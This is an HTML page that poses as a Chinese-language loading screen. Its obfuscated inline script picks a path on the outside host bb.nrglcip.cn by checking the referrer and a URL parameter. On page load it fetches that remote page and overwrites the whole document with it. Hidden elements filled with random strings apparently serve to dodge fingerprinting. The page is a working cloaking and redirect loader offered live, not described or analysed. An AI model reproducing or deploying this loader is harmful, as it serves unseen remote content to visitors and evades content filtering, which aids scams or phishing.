<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .EeKLrl1 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .EeKLrl1 .uBLLsUO {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .EeKLrl1 .content {
            line-height: 50px;
            text-align: center
        }

        .EeKLrl1 .img {
            width: 100%
        }

        .EeKLrl1 .SadjAt {
            text-align: center
        }

        .EeKLrl1 .SadjAt span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .EeKLrl1 .SadjAt span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .EeKLrl1 .SadjAt span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .EeKLrl1 .SadjAt span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .EeKLrl1 .SadjAt span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .EeKLrl1 .SadjAt span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .EeKLrl1 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function aky9jgGxo8Wdd(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var xCSsYKK = aky9jgGxo8Wdd('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ xCSsYKK +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ xCSsYKK +".html?a=share";
		}
		
        nm6fi1g3=url+"#"+new Date().getTime();
        nm6fi1g3 && function() {
            $.get(nm6fi1g3, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >hQOVBQBGoqZNKBZdk1RtwcaE1jR1PTWb86rJ5ls9</h1>
<p  style='display:none'>ylgpRksQgFVHoeJRYRWqPkvSHgvQdSvO0WGYQ72yUSOB6F6dscXskzrZKWj</p>
<b style='display:none' >uku4xKT8qD6qRaP8CL5JfNzYqT1wQ3RaQangUAqgYEG5h16bSVKTWYA97xkv6TrH36tMNjnh7ly9dwCF5F3x9p</b>
<b style='display:none' >uku4xKT8qD6qRaP8CL5JfNzYqT1wQ3RaQangUAqgYEG5h16bSVKTWYA97xkv6TrH36tMNjnh7ly9dwCF5F3x9p</b>
<a  href='#' style='display:none'>G1V4hPMla1GDuUMz1yHeYIyK5SSl6jGfuFcz4F4kcEGnKKdykl9NRMMkS05gOM3Jzctv</a>
<span style='display:none'>WpYnCMSHj1JS5Tiygdcg75eDkDSVPnbKQ4cCrlusyPSXu63tL0gS26nxPP84zMo</span><div class="EeKLrl1">
    <div class="uBLLsUO">
        <div class="SadjAt">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >W7EZikSxUWuKLW2hMZXYMSXaqFPMVGwKOid2M7O7Jki8FHK29zgCIwMrZ3IV7hGxsDmKt</li>
<a  href='#' style='display:none'>ceU5z7H130IB0kpvAyTK1lLfUPVGD59</a>
<b style='display:none' >WxJ73Bmyc1PNbSg1OiY8H3Ung02jIseJKxflPckxoJQp7GQ0BkKXbBBepgR</b>
<img  src='' style='display:none'></body>
</html>